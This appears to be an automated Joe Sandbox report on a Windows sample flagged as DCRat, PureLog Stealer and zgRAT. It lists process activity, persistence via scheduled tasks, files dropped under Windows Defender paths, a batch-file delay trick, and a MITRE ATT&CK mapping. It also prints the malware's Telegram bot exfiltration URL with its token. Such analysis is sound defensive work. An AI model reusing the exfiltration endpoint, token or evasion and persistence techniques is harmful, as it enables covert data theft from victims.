Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 596528	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\CbsTemp\System.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\CbsTemp\System.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: Etqq32Yuw4.exe, 00000000.00000002.1746168028.000000001BD05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
Source: w32tm.exe, 0000001C.00000002.1788435151.00000221CCB27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process token adjusted: Debug
Source: C:\Windows\CbsTemp\System.exe	Process token adjusted: Debug
Source: C:\Windows\CbsTemp\System.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\Etqq32Yuw4.exe "C:\Users\user\Desktop\Etqq32Yuw4.exe"

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Queries volume information: C:\Users\user\Desktop\Etqq32Yuw4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Queries volume information: C:\Users\user\Desktop\Etqq32Yuw4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Queries volume information: C:\Users\user\Desktop\Etqq32Yuw4.exe VolumeInformation	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Queries volume information: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe VolumeInformation	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Queries volume information: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe VolumeInformation
Source: C:\Windows\CbsTemp\System.exe	Queries volume information: C:\Windows\CbsTemp\System.exe VolumeInformation
Source: C:\Windows\CbsTemp\System.exe	Queries volume information: C:\Windows\CbsTemp\System.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Queries volume information: C:\Users\user\Desktop\Etqq32Yuw4.exe VolumeInformation

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 0.2.Etqq32Yuw4.exe.12dac1d8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1741585863.0000000012D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Etqq32Yuw4.exe PID: 7500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Etqq32Yuw4.exe PID: 8056, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: Etqq32Yuw4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Etqq32Yuw4.exe.840000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1654752792.0000000000842000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\CbsTemp\System.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: Etqq32Yuw4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Etqq32Yuw4.exe.840000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\CbsTemp\System.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 0.2.Etqq32Yuw4.exe.12dac1d8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1741585863.0000000012D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Etqq32Yuw4.exe PID: 7500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Etqq32Yuw4.exe PID: 8056, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: Etqq32Yuw4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Etqq32Yuw4.exe.840000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1654752792.0000000000842000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\CbsTemp\System.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: Etqq32Yuw4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Etqq32Yuw4.exe.840000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\CbsTemp\System.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	133 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scripting	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Etqq32Yuw4.exe	87%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
Etqq32Yuw4.exe	100%	Avira	HEUR/AGEN.1323342
Etqq32Yuw4.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\GxFitJjJ.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\QgYydmoq.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe	100%	Avira	HEUR/AGEN.1323342
C:\Windows\CbsTemp\System.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\QgYydmoq.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\NvtiWYey.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe	100%	Joe Sandbox ML
C:\Windows\CbsTemp\System.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\OsUqsYts.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Uninstall Information\gmRWetzDcocJEC.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\GxFitJjJ.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\NvtiWYey.log	9%	ReversingLabs
C:\Users\user\Desktop\OsUqsYts.log	8%	ReversingLabs
C:\Users\user\Desktop\QgYydmoq.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\TnWHzEjm.log	4%	ReversingLabs
C:\Users\user\Desktop\pZhlLBKs.log	25%	ReversingLabs
C:\Users\user\Desktop\xOlSJheb.log	3%	ReversingLabs
C:\Windows\CbsTemp\System.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ipinfo.io	34.117.59.81	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Reputation
https://ipinfo.io/country	false	high
https://api.telegram.org/bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto	false	high
https://ipinfo.io/ip	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://api.telegram.org	Etqq32Yuw4.exe, 00000000.00000002.1738185125.000000000353D000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	Etqq32Yuw4.exe, 00000000.00000002.1738122582.0000000002BF2000.00000002.00000001.01000000.00000000.sdmp, Etqq32Yuw4.exe, 00000000.00000002.1738185125.000000000353D000.00000004.00000800.00020000.00000000.sdmp, TnWHzEjm.log.0.dr	false	high
http://api.telegram.org	Etqq32Yuw4.exe, 00000000.00000002.1738185125.000000000353D000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Etqq32Yuw4.exe, 00000000.00000002.1738185125.0000000002E77000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhotoX	Etqq32Yuw4.exe, 00000000.00000002.1738185125.000000000353D000.00000004.00000800.00020000.00000000.sdmp	false	high
http://ipinfo.io	Etqq32Yuw4.exe, 00000000.00000002.1738185125.00000000034BF000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ipinfo.io	Etqq32Yuw4.exe, 00000000.00000002.1738185125.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, Etqq32Yuw4.exe, 00000000.00000002.1738185125.00000000034A1000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false
34.117.59.81	ipinfo.io	United States		139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582915
Start date and time:	2024-12-31 21:05:17 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Etqq32Yuw4.exe renamed because original name is a hash value
Original Sample Name:	0f52130d0a1abbe40d9f582b1f95a3e3.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@34/26@2/2
EGA Information:	Successful, ratio: 12.5%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Etqq32Yuw4.exe, PID 7500 because it is empty
Execution Graph export aborted for target Etqq32Yuw4.exe, PID 8056 because it is empty
Execution Graph export aborted for target Etqq32Yuw4.exe, PID 8068 because it is empty
Execution Graph export aborted for target System.exe, PID 8104 because it is empty
Execution Graph export aborted for target System.exe, PID 8116 because it is empty
Execution Graph export aborted for target gmRWetzDcocJEC.exe, PID 8076 because it is empty
Execution Graph export aborted for target gmRWetzDcocJEC.exe, PID 8084 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Etqq32Yuw4.exe

Simulations

Behavior and APIs

Time	Type	Description
15:06:11	API Interceptor	30x Sleep call for process: Etqq32Yuw4.exe modified
20:06:11	Task Scheduler	Run new task: Etqq32Yuw4 path: "C:\Users\user\Desktop\Etqq32Yuw4.exe"
20:06:11	Task Scheduler	Run new task: Etqq32Yuw4E path: "C:\Users\user\Desktop\Etqq32Yuw4.exe"
20:06:11	Task Scheduler	Run new task: gmRWetzDcocJEC path: "C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe"
20:06:11	Task Scheduler	Run new task: gmRWetzDcocJECg path: "C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe"
20:06:11	Task Scheduler	Run new task: System path: "C:\Windows\CbsTemp\System.exe"
20:06:11	Task Scheduler	Run new task: SystemS path: "C:\Windows\CbsTemp\System.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	XClient.exe	Get hash	malicious	XWorm	Browse
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	iviewers.dll	Get hash	malicious	LummaC	Browse
	Flasher.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse
	i8Vwc7iOaG.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar	Browse
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	cMTqzvmx9u.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse
34.117.59.81	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	ipinfo.io/json
	Code%20Send%20meta%20Discord%20EXE.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	idl57nk7gk.exe	Get hash	malicious	Neshta	Browse	ipinfo.io/json
	idl57nk7gk.exe	Get hash	malicious	Neshta	Browse	ipinfo.io/json
	FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	172.104.150.66.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	VertusinstruccionesFedEX_66521.zip	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	UjbjOP.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	I9xuKI2p2B.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	licarisan_api.exe	Get hash	malicious	Icarus	Browse	ipinfo.io/ip

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipinfo.io	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	34.117.59.81
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	34.117.59.81
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	34.117.59.81
	58VSNPxrI4.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	main1.bat	Get hash	malicious	Abobus Obfuscator	Browse	34.117.59.81
	pyld611114.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
	https://bu.marcel-andree.de/	Get hash	malicious	Unknown	Browse	34.117.59.81
	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Get hash	malicious	Unknown	Browse	34.117.59.81
api.telegram.org	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	149.154.167.220
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	XClient.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	iviewers.dll	Get hash	malicious	LummaC	Browse	149.154.167.220
	Flasher.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	149.154.167.220
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	over.ps1	Get hash	malicious	Vidar	Browse	149.154.167.99
	MatAugust.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	149.154.167.220
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	XClient.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	botx.sh4.elf	Get hash	malicious	Mirai	Browse	34.118.114.163
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	34.117.61.150
	arm.elf	Get hash	malicious	Mirai, Moobot	Browse	34.67.61.212
	rpDOUhuBC5.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	rpDOUhuBC5.exe	Get hash	malicious	Credential Flusher	Browse	34.117.188.166
	https://greensofttech1-my.sharepoint.com/:f:/g/personal/stella_huang_greensofttech1_onmicrosoft_com/EuOSopXBEUpFhaHAwqFRDM8BeWLY-Gsl0U9Az2fOy4x80A?e=GhPegT&xsdata=MDV8MDJ8TVB1Z2FAaHljaXRlLmNvbXxjMDM5NmJhZjcxOTM0YzBkMTc3ZDA4ZGQxMzcwNWQ3MnxmYzVjNjhmNjk3ZjM0ZWZlYjY4OWViNWMxMjM0ZjgyMXwwfDB8NjM4Njg4MDk1NTQ0NTA0NzA2fFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=SVpsejJNYUlwY213VjNreGxSNU1LaFJXcnpXS3pwWjhYR2k5ZUthLzlsMD0%3d	Get hash	malicious	HTMLPhisher	Browse	34.117.121.53
	ReJIL-_Document_No._2500015903.msg	Get hash	malicious	Unknown	Browse	34.117.188.166
	Canvas of Kings_N6xC-S2.exe	Get hash	malicious	Unknown	Browse	34.117.223.223
	Canvas of Kings_N6xC-S2.exe	Get hash	malicious	Unknown	Browse	34.117.223.223
	cMTqzvmx9u.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse	34.117.59.81

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	OPRfEWLTto.js	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	http://4.lkx91.michaelhuegel.com/news?q=IP%20provider%20is%20blacklisted!%20MICROSOFT-CORP-MSN-AS-BLOCK	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	over.ps1	Get hash	malicious	Vidar	Browse	149.154.167.220 34.117.59.81
	http://trezorbridge.org/	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	tyPafmiT0t.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Rags Stealer	Browse	149.154.167.220 34.117.59.81
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	149.154.167.220 34.117.59.81
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220 34.117.59.81
	Statement of Account - USD 16,720.00.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 34.117.59.81
	GYede3Gwn0.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	149.154.167.220 34.117.59.81

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\GxFitJjJ.log	KzLetzDiM8.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	f3I38kv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	aimware.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	ZZ2sTsJFrt.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	r6cRyCpdfS.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	tBnELFfQoe.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Z4D3XAZ2jB.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	67VB5TS184.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	F3ePjP272h.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	cbCjTbodwa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\Windows Defender\en-GB\a4a755f39d8609

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	ASCII text, with very long lines (312), with no line terminators
Category:	dropped
Size (bytes):	312
Entropy (8bit):	5.785987586142407
Encrypted:	false
SSDEEP:	6:HGO3o6feIL7NgojW2YlWufh8IkeYo82pE20ODWpxHXdg12xA7R:mO35WIL7KojpMhkJo8kvDWpx+R
MD5:	8EAE611F6B016BA74D235420934CE4C0
SHA1:	407A2358BF5D8C88D5C353CEB091CDB2A335BE05
SHA-256:	C508E29AC5E5CACEFDB55A7590C8730E73D20AA67A2D82BE4DB26320B808E37E
SHA-512:	DA7C09525463C92B1D457F6E8C7DD652BE461906D5A9D9D60CC1474097CCFEEA84542448A93D188244828049D1F963866386463348669223B8CC3F0AC2854EF3
Malicious:	false
Preview:	l3GY2KQNjsDWUEfJ30O7gB72ngXXNlrSbgVFyXDvw6bKftHvsMcdaswk5OvWw2A7Au4xsaVgxdLkkwX3YmoAIO2tuvJklq836dKuzUCS16q6hMAJ128KN9yv2LD7Qu4GeRnGmmEEkWIMi5MivAttsyq7oY2nQEBHCkbPi3gOx3j01mN69fLQBKXqkqcNtaxfUBJ8e692de6yOzFBL6ou3vF2Mvo2bSfWFEfzdObDgTxhOicvkaCxwDmj5RvtRGbK9jsJTQi6elOj8iooS3SAQrkCc63Lcsva2miozSbU1FSLzDlXnHaXya4R

C:\Program Files (x86)\Windows Defender\en-GB\gmRWetzDcocJEC.exe

Download File

Process:	C:\Users\user\Desktop\Etqq32Yuw4.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1995264
Entropy (8bit):	7.563817177395898
Encrypted:	false
SSDEEP:	24576:3D3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLe/Jd0H1kI1n2:TTyyfXPzXKBy2GyGw4O0lmJIJ
MD5:	0F52130D0A1ABBE40D9F582B1F95A3E3
